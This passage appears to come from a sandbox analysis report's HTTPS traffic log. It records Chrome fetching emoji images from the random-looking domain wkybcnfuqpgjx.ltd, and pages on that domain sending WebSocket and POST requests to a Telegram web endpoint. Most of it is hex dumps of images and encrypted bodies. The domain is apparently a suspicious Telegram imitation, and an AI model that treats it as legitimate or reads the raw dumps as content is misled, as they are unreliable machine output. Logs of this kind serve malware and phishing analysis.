                                  2025-01-12 00:04:05 UTC1369INData Raw: 7c 3d 40 10 04 d9 b5 d1 08 8a 48 5a 97 bc 87 d7 3e 5f 0b a7 ed 11 bf 81 d6 8e d2 28 2d 69 c0 30 d1 dc 02 e7 34 e7 ce 1c f8 42 4f 99 d2 92 bd c0 ad 49 78 20 f0 9b 28 c0 66 a9 be 38 b0 dc 74 f2 e4 51 ef 8a cb e3 21 c9 e0 35 46 e3 35 2a 8d 37 02 de 9e 36 2a 35 67 d6 6e 37 30 1a 1b 4b 1a 4f 31 2f 7b 30 96 48 9b c3 a9 e6 8c f0 a0 3e 41 3b 0c ef 4b 60 3c ca 5e 20 08 b7 80 8b db 81 7f 3a 18 48 7f fb 5e 90 bf b2 7c 12 e2 5e 09 80 30 e4 d9 60 14 34 86 23 bd bc 52 9f d9 d1 d1 71 06 25 ab e6 76 03 f3 d4 a9 53 8c 82 0d 36 f8 7a ab ab 39 49 f5 e1 e1 65 94 51 3c 9a b4 8c f1 87 8e f8 ed 40 4a 18 01 1e fb 86 02 42 62 07 82 90 1e c7 e7 7a 3b 41 f8 70 69 c5 e5 72 85 f8 78 3b b3 80 06 61 b4 0f d7 57 5e 3c 73 e6 22 7c ce a4 23 20 8d c6 64 04 61 78 8b 17 a0 be 9a 51 f0 b1 37
                                  Data Ascii: |=@HZ>_(-i04BOIx (f8tQ!5F5*76*5gn70KO1/{0H>A;K`<^ :H^|^0`4#Rq%vS6z9IeQ<@JBbz;Apirx;aW^<s"|# daxQ7
                                  2025-01-12 00:04:05 UTC1369INData Raw: 78 3a 29 a9 9a c3 d9 ec 6d 0e d9 56 88 e0 c6 8d c6 f0 7d 95 76 ea c2 a5 57 00 79 f0 5b ec 10 e6 54 ea f2 4a b3 af 66 5f 6d 76 b2 3c 2e 38 49 5d b1 34 28 94 8f 93 eb ee cf 3b f7 0e 31 9a 83 3b 81 49 9c f0 09 52 b3 30 52 3f cf 47 97 41 ac 38 d8 da 5e 22 85 eb 2a 6d eb 6f 92 bd 40 8c 85 e3 38 1b 0b 1c ca d6 a9 8f 9d d5 e5 a6 a4 c9 c6 79 a1 00 8e 93 ae a8 40 b8 0f de bb 36 d0 c5 15 cd 79 97 1f b6 75 6e db 06 23 ab b8 36 02 44 c2 85 91 de fa d1 f9 09 16 04 ae 31 5a b8 ba 0a 06 da 19 65 52 a4 db 0f c8 c3 d6 3f 7b eb 4a 91 7e e9 50 f6 bb 37 2b 52 8a d4 46 a3 4e 79 73 5c 6f ce 53 5a 7c ae 18 80 10 3a 18 57 e0 16 30 b1 5e bf fc a8 ad ad e3 62 66 66 64 97 06 df 16 10 2e 0b ac 70 f8 bd b3 68 7d 54 cf f6 a2 31 26 90 91 76 00 d0 a2 94 c9 de ff 63 5e ee af a7 a6 27 27
                                  Data Ascii: x:)mV}vWy[TJf_mv<.8I]4(;1;IR0R?GA8^"*mo@8y@6yun#6D1ZeR?{J~P7+RFNys\oSZ|:W0^bffd.ph}T1&vc^''
                                  2025-01-12 00:04:05 UTC1369INData Raw: 00 a2 5c 7b 80 6f e4 56 28 24 f2 2e a7 50 31 a9 68 96 84 27 a1 59 66 34 10 a6 0c 71 51 5d 69 91 35 1a b0 28 ed f1 1b 7a 7c e0 32 23 7c a7 29 80 4f 94 06 11 8d 76 0a 6c bf fb 22 7e af 6d 2f d0 a2 54 1a 35 b8 87 20 34 2a 81 1c 74 32 58 21 66 07 21 b0 68 24 ea 94 ab 69 86 68 c0 34 78 5c 9c 9d 9d a6 bc 77 0f 78 90 fd 1b 3c 5d 5e 83 75 31 2f 01 0d 6c e8 e1 73 47 cf e1 04 6a 5b 3e 00 e8 87 4d 45 61 c6 5d 4e ab 0a f7 e8 4d 6a 49 86 d0 65 55 e9 e5 7a a7 59 22 51 2a 75 78 0c c0 73 d9 f0 a0 b8 ee c9 b9 2b 15 bf fa d5 3d c0 95 6d cb 05 ae b6 36 a9 1a f9 e0 09 6b 87 fb e1 df 7f 7f 14 d9 7a d0 bb 86 84 f8 84 68 40 0c 23 cd 04 26 57 e0 04 6e b0 10 72 87 26 43 a6 12 08 ba 1c 06 83 59 a5 30 5b 65 6a b3 cf 1f 13 10 de 06 d4 d5 c1 43 f7 e4 27 ef 5d 79 e7 3c 40 23 b9 e4 ea
                                  Data Ascii: \{oV($.P1h'Yf4qQ]i5(z|2#|)Ovl"~m/T5 4*t2X!f!h$ih4x\wx<]^u1/lsGj[>MEa]NMjIeUzY"Q*uxs+=m6kzh@#&Wnr&CY0[ejC']y<@#
                                  2025-01-12 00:04:05 UTC492INData Raw: 8d d2 20 a4 f9 7c 1e 4f 22 91 26 ed 0e b5 85 21 32 23 49 02 7c 1b 3e 0d e0 ee 5b c0 c7 51 20 15 36 01 88 a8 89 b1 dd 63 8d 46 03 fe c5 58 2c 16 81 78 9e 0f f4 f3 06 bc 83 54 67 3a 9d 00 a2 e4 83 bf ac 0d dc 99 06 c4 a6 4d f0 16 81 4d fc 9a 18 1b a5 c5 08 2d 14 0a f1 df 75 1f 69 de 91 02 60 4c 24 3c 9e 48 44 1b 88 4f 09 fd 0f 8d 36 90 4e 10 85 b7 fd 86 69 50 7f 6a 21 88 e8 5c 2e db 92 63 c1 ee 64 18 c6 8a 2d 2e 5a 19 a7 db 6e 5f 76 2c d9 fa 54 d0 f3 11 1e be 9f 95 a9 40 22 a4 0f f2 00 a8 29 a4 32 a4 51 1b a5 91 6c 16 74 b9 99 d7 de ea b2 3a ed 0e 8b 8b 08 79 5e 0b 48 84 40 c4 31 aa 42 68 08 88 c2 1a 11 d6 6a f0 9b 74 a3 3d 36 97 c5 61 77 82 4b 67 8b 8c db e1 42 61 48 03 e8 45 a1 3f 33 30 f6 7a c3 43 7c 54 ab c1 5b 47 b5 4e 07 be 54 59 17 69 9b 74 b7 51 9b
                                  Data Ascii: |O"&!2#I|>[Q 6cFX,xTg:MM-ui`L$<HDO6NiPj!\.cd-.Zn_v,T@")2Qlt:y^H@1Bhjt=6awKgBaHE?30zC|T[GNTYitQ


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  139192.168.2.650101172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC370OUTGET /img-apple-160/1f1e7-1f1e9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4161
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1041"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2haoNjEURESOsCdbKz2CoAgoqRqZT%2FAwDNXoVDVkzumUHCYhCZxpc%2FZJmmB8hPgmrRDIOis1vmrxK%2FVsBVbpykdjPqenv2gW8%2FOw6Q2tOTsZwXOqaGaZ8V5MlcLZ63CJosNi%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31969a9c407-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1484&rtt_var=575&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1871794&cwnd=197&unsent_bytes=0&cid=df8a61d3be5f87be&ts=139&x=0"
                                  2025-01-12 00:04:04 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 3a 5e 54 14 3b 30 6b 8e 83 15 3d 31 6b 8c 82 18 3e 33 6c 8f 85 14 3b 2f 68 8a 80 74 96 8c 15 3c 30 15 3c 31 6e 90 86 15 3c 30 5b 80 75 72 94 8a 23 55 47 1d 47 3b 71 93 89 10 38 2c 36 65 58 5a 7f 74 6d 8f 85 22 4e 40 0c 3e 2f 68 8a 80 1b 42 37 0e 36 2a 68 8a 80 75 97 8d 6b 8d 83 44 6d 61 16 3d 32 70 92 88 5e 82 78 14 3b 30 6d 8e 84 19 40 35 73 95 8b 10 37 2b 69 8a 81 1b 42 37 10 36 2b 6f 91 87 39 64 58 1b 42 36 75 96 8c 0f 36 2b 62 85 7b 0f 35 2a 71 93 89 74 96 8c 70 93 88 6c 90 85 68 8e 83 67 8b 80 61 8e 80 5f 8b 7e 59 8d 7d 64 87 7d 5a 88 7b f1 4c 22 52 8b 7a d9 54 2e 5e 83 78 f6 47 1e c3 5c 37 d1 56 30 df 50 29 e8 4c 24 de
                                  Data Ascii: PNGIHDRPLTEGpL:^T;0k=1k>3l;/ht<0<1n<0[ur#UGG;q8,6eXZtm"N@>/hB76*hukDma=2p^x;0m@5s7+iB76+o9dXB6u6+b{5*qtplhga_~Y}d}Z{L"RzT.^xG\7V0P)L$
                                  2025-01-12 00:04:04 UTC1369INData Raw: 72 64 25 81 6c 31 7c 66 63 67 4b 30 7b 65 3e 74 64 31 7a 64 2f 79 63 53 6a 4f 30 78 62 31 76 62 2d 78 62 23 7c 67 2d 77 61 16 80 6d 2c 77 60 32 74 5f 2c 76 60 36 71 5f 2b 75 5f 2c 74 5e 3e 6b 5d 29 74 5e 13 7d 69 2e 71 5c 29 73 5d 23 75 60 31 6e 5b 28 72 5c 26 72 5c 27 71 5b 14 78 64 27 70 5a 2e 6c 59 25 70 5a 28 6e 59 25 6f 59 18 74 60 25 6e 59 29 6c 58 23 6e 58 24 6d 58 2c 69 56 22 6d 57 24 6c 56 22 6d 56 25 6a 56 23 6b 55 21 6c 55 20 6b 55 2e 64 54 25 68 55 21 6a 54 1f 6a 54 20 69 54 26 66 52 20 68 53 1e 69 53 26 65 51 1e 68 52 1d 67 51 1d 66 51 29 60 50 1f 65 50 1b 66 50 1b 65 4f 1a 64 4e 1f 61 4e 25 5e 4d 19 63 4d 19 62 4c 25 5b 4b 17 62 4b 1c 5f 4b 17 61 4b 17 60 4b 16 60 4a 15 5f 49 22 58 48 1a 5c 48 15 5e 49 14 5e 48 14 5d 47 21 56 46 13 5d 46 22
                                  Data Ascii: rd%l1|fcgK0{e>td1zd/ycSjO0xb1vb-xb#|g-wam,w`2t_,v`6q_+u_,t^>k])t^}i.q\)s]#u`1n[(r\&r\'q[xd'pZ.lY%pZ(nY%oYt`%nY)lX#nX$mX,iV"mW$lV"mV%jV#kU!lU kU.dT%hU!jTjT iT&fR hSiS&eQhRgQfQ)`PePfPeOdNaN%^McMbL%[KbK_KaK`K`J_I"XH\H^I^H]G!VF]F"
                                  2025-01-12 00:04:04 UTC1369INData Raw: 7f 53 12 ec f3 40 50 7d e0 e9 7c 02 4e da 48 91 68 dd 87 87 8f a3 78 a5 63 a0 06 c8 93 8a 65 ba d6 77 93 1f 47 ab de 0c 89 aa f7 e7 49 9d 0b 30 2f 02 3d a8 00 90 4e c3 7c f4 24 c8 ef 3f dd de 86 d1 28 e2 ba 7b 5c 49 f7 be be 98 d5 fb 59 6e a9 38 9d d7 40 77 fb 4e 2f 47 c4 37 b6 f6 f8 52 42 02 21 a5 14 3f 17 42 a0 ad 5c fd cd ab b9 ed b6 6d 04 61 f8 9f d9 25 45 5a 56 ac c4 8e ed 38 b1 9a 14 28 1a a0 ed fb bf 46 0b e4 a2 28 7a 48 6d 27 cd 41 4e ed e8 44 91 7b 68 2a 8b 06 17 ab 25 23 c6 e1 77 23 d8 20 c7 1f ff d9 1d 52 a0 5f bc 3b 7b b2 9f 1a 78 18 71 f8 fe d7 97 b1 40 03 b6 ac 66 c0 2b 4b 5d d4 09 96 b1 e9 f5 27 59 6d 01 63 35 c1 83 e3 64 fc 22 4a be 9b de 94 77 30 9f c8 77 fb 7f 9f 59 35 47 15 63 b5 51 46 6b e5 46 e8 f4 4b 34 af 41 6d 61 d7 b6 04 6b 6c 39
                                  Data Ascii: S@P}|NHhxcewGI0/=N|$?({\IYn8@wN/G7RB!?B\ma%EZV8(F(zHm'AND{h*%#w# R_;{xq@f+K]'Ymc5d"Jw0wY5GcQFkFK4Amakl9
                                  2025-01-12 00:04:04 UTC955INData Raw: 90 bc 57 cd d2 cb 30 7e 3c c8 b2 25 33 aa 44 09 4d a7 fc f4 c7 83 c2 04 46 78 c3 40 23 0d 0f 19 ee ab d0 37 21 1a 80 84 d5 0c 99 33 d6 90 fe 61 fa b3 02 62 09 05 f0 7f ed db 4d 6f db 46 10 80 e1 77 67 96 5c 52 92 3f 12 bb 87 00 45 fe 86 5b b8 fd ff 87 d6 39 b6 f7 5e 0a b4 4d 03 47 b6 25 93 bb 33 85 25 2f 2a d7 32 ec 7e 05 39 f0 bd 08 02 74 78 34 43 10 5a 40 34 1a b3 15 cb f6 8b a3 93 fe e6 86 9a 16 b4 fe 8f fa 3e 71 05 74 47 56 79 6a f0 32 a0 14 36 69 7e f2 a7 21 96 67 df bc ff 21 7e 5c 8f f9 cd fb 37 bf e6 c8 c1 87 d3 d3 c3 45 7f bd e5 29 f5 a5 5b 03 01 09 d2 29 5d 62 4e 27 51 35 36 96 40 62 a5 7a 10 5e 0a 44 73 70 80 80 f3 44 62 a3 bf fa 76 79 79 f9 7b 58 2e 96 1d dd eb a3 b7 de af ed 26 54 1b 1b 5b c7 9d c7 fb 86 cd 73 06 31 35 b1 8b d0 b6 d0 45 a0 aa
                                  Data Ascii: W0~<%3DMFx@#7!3abMoFwg\R?E[9^MG%3%/*2~9tx4CZ@4>qtGVyj26i~!g!~\7E)[)]bN'Q56@bz^DspDbvyy{X.&T[s15E


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  140192.168.2.650100149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC539OUTGET /apiws HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: Upgrade
                                  Pragma: no-cache
                                  Cache-Control: no-cache
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Upgrade: websocket
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-WebSocket-Version: 13
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Sec-WebSocket-Key: g+fGyrQDirUG79rAjQQZMA==
                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                  Sec-WebSocket-Protocol: binary
                                  2025-01-12 00:04:05 UTC150INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  2025-01-12 00:04:05 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  141192.168.2.650107149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 152
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC152OUTData Raw: 2a 10 06 78 25 cb 00 4d aa 84 e0 aa ad 04 da 70 48 d0 5c f6 47 8e fc 2e c0 07 70 f9 58 7f 7c de 63 28 a4 59 e2 da 1f 51 03 6a 31 ad ba 5a ae 8c 4f 18 35 c0 15 f1 ac 1b ad 2b 3c 63 6f bc 52 29 90 43 1d 7d 8f 58 51 f5 e5 8c ac 50 67 3f e2 8f 84 46 15 5f ce 96 36 0c 03 e0 df 79 d5 62 2f f5 24 83 6f f1 81 cd c5 6a f3 72 72 ae 58 37 46 cb 33 12 1f 1e 15 81 33 31 33 e6 89 a2 14 26 7a e1 7c 3d 0b df ca 57 a4 e1 ac b2 ae 3c 8f 04 27 31 dd c0 49 e6 cb 05 e7 27
                                  Data Ascii: *x%MpH\G.pX|c(YQj1ZO5+<coR)C}XQPg?F_6yb/$ojrrX7F3313&z|=W<'1I'
                                  2025-01-12 00:04:05 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:05 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d fd 8a fa ad 6b cf 03 c3 0b 32 49 56 37 32 91 04 55 3e fa 47 ef 48 13 44 75 10 e7 ce 90 72 38 86 c8 10 d9 38 b2 a3 e1 2f f3 cf 76 a9 f6 6d 2b a5 99 fd 78 d4 63 c4 06 37 e7 9c 6d 61 9b 1e 96 08 2e 42 cf 5a 35 95 c2 dd fb 6d ce 9a 97 a1 60 e7
                                  Data Ascii: *x%Mk2IV72U>GHDur88/vm+xc7ma.BZ5m`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  142192.168.2.650119172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC370OUTGET /img-apple-160/1f1e7-1f1e7.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: image/png
                                  Content-Length: 4376
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-1118"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2BsXhf%2BG1aDZRJdfBl9uBhw7BRLgYPB%2F5D4W0NRmhm5%2FhEsSpXzWvzu36BkTBwyYdKlrzm5UG7IoygKQgO2p8UD8lstsYoy1iHNuEbjMJEeInqB2wSCrxhZz3sGD3DSZodVw1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31dca4cc452-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1480&rtt_var=1086&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=809537&cwnd=211&unsent_bytes=0&cid=31c025277dc3e642&ts=156&x=0"
                                  2025-01-12 00:04:05 UTC470INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 65 60 54 5e 59 4e cf b9 7b cf b9 7b 0c 1b 43 6b 6e 78 0a 1a 43 5e 6c 8e 84 6a 22 06 17 3f 61 6f 92 ce b8 7b 83 6a 23 0f 1e 44 64 72 95 5d 6b 8f 16 2c 5e cf b9 7b 82 69 22 06 17 3f 2a 3f 70 00 11 3a 60 6f 92 15 27 53 00 15 47 60 6e 91 84 6b 23 cf b8 7b 62 71 93 06 16 3e 3c 4b 75 66 74 96 84 6b 23 5f 6d 8f ce b8 79 06 17 3f d0 b9 7b 66 74 96 83 6a 23 08 18 40 5f 6d 8f cc b7 7a 84 6a 23 64 73 97 09 1a 41 cf b9 7b cf b9 7a cf b9 7a 5d 6c 8e 84 69 22 05 15 3d 79 82 97 33 45 70 ff f4 4c ff ea 4a ff e6 49 ff e3 48 ff e1 47 ff df 47 ff db 46 ff d9 46 ff d6 46 ff d4 45 ff d2 45 ff d3 3f ff d0 45 ff d1 3d ff d0 3e ff ce 45 fe ce 45 ff
                                  Data Ascii: PNGIHDRPLTEGpLe`T^YN{{CknxC^lj"?ao{j#Ddr]k,^{i"?*?p:`o'SG`nk#{bq><Kuftk#_my?{ftj#@_mzj#dsA{zz]li"=y3EpLJIHGGFFFEE?E=>EE
                                  2025-01-12 00:04:05 UTC1369INData Raw: 3d 51 81 3d 50 7e 38 50 88 59 4d 2c 38 4c 7b 35 4c 82 31 4c 8c 30 48 7e 4f 46 2b 2a 45 84 22 42 92 27 42 84 28 40 7b 45 3e 2a 1e 3d 89 29 3c 69 1e 3c 82 1c 3b 87 1b 3a 85 1f 39 7a 19 39 84 19 38 83 18 37 82 17 37 83 16 36 81 1a 35 77 16 35 7f 15 35 80 38 34 27 14 34 7f 14 33 7f 14 33 7d 0c 32 90 13 32 7d 14 31 79 15 31 76 12 31 7c 16 30 70 11 30 7a 0a 30 8c 10 30 7c 13 2f 73 11 2f 78 0a 2f 88 16 2f 68 0f 2f 7a 0f 2e 7a 30 2d 26 15 2d 67 0e 2d 79 0e 2d 77 0e 2c 76 0c 2c 78 16 2c 5d 11 2b 6a 0e 2b 70 0b 2b 76 14 2a 5f 0b 2a 75 0b 2a 74 14 29 5b 0b 29 72 29 28 26 09 28 74 0b 27 6c 08 27 72 07 27 73 26 26 26 0f 26 5d 07 26 6f 06 26 71 06 25 6f 06 25 6d 15 24 48 09 24 64 04 24 70 22 23 23 04 24 6c 04 23 6e 04 23 6c 0f 22 51 03 22 6c 03 21 6a 02 21 6b 1f 20 23
                                  Data Ascii: =Q=P~8PYM,8L{5L1L0H~OF+*E"B'B(@{E>*=)<i<;:9z987765w5584'433}22}1y1v1|0p0z00|/s/x//h/z.z0-&-g-y-w,v,x,]+j+p+v*_*u*t)[)r)(&(t'l'r's&&&&]&o&q%o%m$H$d$p"##$l#n#l"Q"l!j!k #
                                  2025-01-12 00:04:05 UTC1369INData Raw: aa c3 6d a9 6d 97 4d 08 86 8d 6a 62 bb f0 ac 0b 09 d7 5d 77 27 30 01 68 83 69 da 8e b4 a0 62 7b 19 67 da df cd 04 d9 69 5b 27 81 6d 86 eb 9e 69 46 b6 8f a9 e3 0d 80 7d bc 76 bb 74 29 42 57 42 19 3b 5f 10 46 92 a0 41 f1 24 72 4d 11 20 6d e8 1a d8 59 64 2c 1d ac c6 4a 6c 2d b5 61 00 6e 75 56 cc 07 b8 dd 80 b8 ff 47 e2 47 b6 35 1d 7c 3c 06 fc f0 8d aa 26 dd 01 8b 48 aa 3f a2 e2 2a 89 d2 6f 2f 30 8d 2d 13 83 ea 44 b7 36 33 80 f0 e2 83 ef 3f 3c e1 65 b2 de dc b8 d2 11 db 55 fe 2e 35 d1 18 6d e7 7a ef f0 bd 3f 16 b7 6c af cd 3c a3 d9 be 09 5e 85 ab 8a 24 e8 72 a7 1f 7f fb ec 9b 4f d2 0a ba 44 a8 4f 93 32 a8 79 b9 11 c6 ff 87 29 2f 99 1a 2c fd 7f c4 d8 4f 68 1c 55 1c c0 f1 ef cc 9b c9 ce 6c 92 6d 9a 6a 96 b4 ca 56 da 62 c5 16 89 55 db d4 b4 a4 10 11 72 91 52 bd
                                  Data Ascii: mmMjb]w'0hib{gi['miF}vt)BWB;_FA$rM mYd,Jl-anuVGG5|<&H?*o/0-D63?<eU.5mz?l<^$rODO2y)/,OhUlmjVbUrR
                                  2025-01-12 00:04:05 UTC1168INData Raw: ee e1 d9 bb 1f bf f1 e6 29 4c 9f de f5 36 31 5a cc 04 95 3d ab 17 f1 f9 05 fd 7a 98 a0 93 e5 5f 3e fe 64 bd 7e fc e1 8f 5e 3b 85 84 9f 18 18 83 31 90 e7 6d d4 c6 50 24 7b f2 b3 5f dc f9 dd 9d 3f ff f5 3e 6d 64 66 ec c3 73 d9 4f 6f ae c4 af bc 5f aa b9 09 b2 52 6e 00 c7 75 29 e6 40 04 86 fa 49 b3 5d 7f 85 55 95 fd 08 ce 4c cc 80 8a 7e 4c 4c af 16 b0 8e fc be 04 93 30 0c 03 4f 09 92 ae 31 4f 60 d7 2a 71 a5 7c 05 6c d0 7e 75 3b 31 0b e0 c2 d0 25 e0 5e 12 a4 c4 3e 04 a3 17 51 d1 2f 70 de 1a 3d db 25 b1 ff 35 14 14 10 86 21 7b 76 d2 d1 36 c7 36 61 a8 a0 30 7c 5c 8a d4 c3 a4 46 18 40 42 48 42 bf 83 db 7d 0c 26 00 19 18 b1 07 ca 44 4d c2 be 3d 41 49 b2 3b e6 0a a1 8f 88 a6 2d 2b c7 3e 5c a0 af 85 98 f6 e8 c6 b7 9f 9e 15 67 13 cf 65 0c 11 71 d0 4f ea 2b 5d 60 7f
                                  Data Ascii: )L61Z=z_>d~^;1mP${_?>mdfsOo_Rnu)@I]UL~LL0O1O`*q|l~u;1%^>Q/p=%5!{v66a0|\F@BHB}&DM=AI;-+>\geqO+]`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  143192.168.2.650120172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC608OUTGET /img-apple-160/1f1e7-1f1f9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC906INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: image/png
                                  Content-Length: 6598
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-19c6"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QjjWpeA5sZ4ORNbQgv7L%2FXOjUo9GFe0tVEidvwDfsi8YRm9LHi8p8%2FHPXkhe2EyzW0%2FLDC4Gi24huBu360L1jJxlYQMJpfpR4I%2B47ASQ3hKt1%2BO%2B2%2BUvPVg00wwofAzHg50Dkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31dc8098ce8-EWR
                                  alt-svc: h3=":443"; ma=86400
